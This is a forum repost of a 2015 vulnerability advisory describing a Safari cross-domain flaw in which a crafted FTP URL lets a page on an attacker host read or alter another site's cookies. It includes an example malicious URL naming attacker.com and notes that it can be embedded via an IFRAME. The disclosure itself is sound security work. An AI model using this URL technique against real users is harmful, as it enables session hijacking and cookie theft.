KhiZaRix Posted April 13, 2015 Report Posted April 13, 2015 (edited) OVERVIEW==========The 4/8/2015 security updates from Apple included a patch for a Safaricross-domain vulnerability. An attacker could create web contentwhich, when viewed by a target user, bypasses some of the normalcross-domain restrictions to access or modify HTTP cookies belongingto any website.Most websites which allow user logins store their authenticationinformation (usually session keys) in cookies. Access to these cookieswould allow hijacking authenticated sessions. Cookies can also containother sensitive information.All tested Safari versions on iOS, OS X, and Windows were vulnerable.The number of affected devices may be of the order of 1 billion.Technically, the attacker can spoof the âdocument.domainâ property.Itâs possible that this could lead to compromise of other resourcesapart from cookies. However, cookies was the only practical attackscenario found with the tested versions of Safari.The HttpOnly and Secure cookie flags represent an important mitigatingfactor albeit with some caveats (see below).DETAILS========Safari supports the FTP URL scheme allowing HTML documents to beaccessed via URLs beginning with "ftp://". These URLs can be of theform [url]ftp://user:password@host/path[/url]. The problem arises when encodedspecial characters are used in the user or password parts.Consider the following URL: [url]ftp://user%40attacker.com%2Fexploit.html%23@apple.com/[/url]If correctly interpreted, the URL refers to a document on apple.com.However, when loaded by a vulnerable browser, the network layer usesan extraneously decoded version of the URL: [url]ftp://user@attacker.com/exploit.html#apple.com/[/url]The document would be loaded from attacker.com, not apple.com. Yet thedocument properties such as âdocument.domainâ and âdocument.cookieâare correctly initialised using âapple.comâ.The attacker-supplied document, exploit.html, can therefore access andmodify cookies belonging to apple.com via JavaScript.Itâs possible that cookies arenât the only resource accessible thisway, but at least recent Safari versions (tested desktop only) use thedocument origin instead of only host or domain for most other accesscontrol, e.g. password autofilling and geolocation permissions.The attack can be performed on normal web pages by embedding an IFRAMEpointing to an FTP URL.MITIGATING FACTORS===================The cookie attack requires JavaScript so existing cookies with theHttpOnly flag canât be seen by the attacker. Support for this flagreportedly appeared in Safari 4. Earlier versions would be vulnerableeven with the HttpOnly flag.Safari allows (over)writing of HttpOnly cookies so the flag doesnâtprevent this vulnerability to be exploited for session fixation andsimilar attacks.Cookies with the Secure flag arenât accessible for documents loaded via FTP.VULNERABLE VERSIONS=====================The following versions were tested and found vulnerable:- Safari 7.0.4 on OS X 10.9.3- Safari on iPhone 3GS, iOS 6.1.6- Safari on iOS 8.1 simulator- Safari 5.1.7 on Windows 8.1Earlier versions werenât available for testing, but according toavailable statistics their usage should be negligible.SOLUTION=========Apple was notified on January 27, 2015. The following patches werereleased in April 2015:- APPLE-SA-2015-04-08-3 iOS 8.3 - iPhone 4s and later, iPod touch (5thgeneration) and later, iPad 2 and later- APPLE-SA-2015-04-08-1 Safari 8.0.5, Safari 7.1.5, and Safari 6.2.5 -OS X Mountain Lion, Mavericks, YosemiteFor more information see: [url]https://support.apple.com/en-us/HT201222[/url]WORKAROUND=============The attacker has to set up an FTP server or use an existing publicone. Such server can run on any TCP/IP port number.One way to stop such attacks (e.g. for older devices with no availablepatch) would be to deny all traffic to the public internet andconfigure the device to use a HTTP proxy located in the internalnetwork. This should prevent access to all FTP URLs.CREDITS========The vulnerability was found and researched by Jouko Pynn??nen of KlikkiOy, Finland.-- Jouko Pynnonen <jouko@iki.fi>Klikki Oy - [url=http://klikki.fi]Klikki Oy -[/url] - @klikkioySource: http://packetstorm.wowhacker.com/1504-exploits/safari-crossdomain.txt Edited April 17, 2015 by KhiZaRix Quote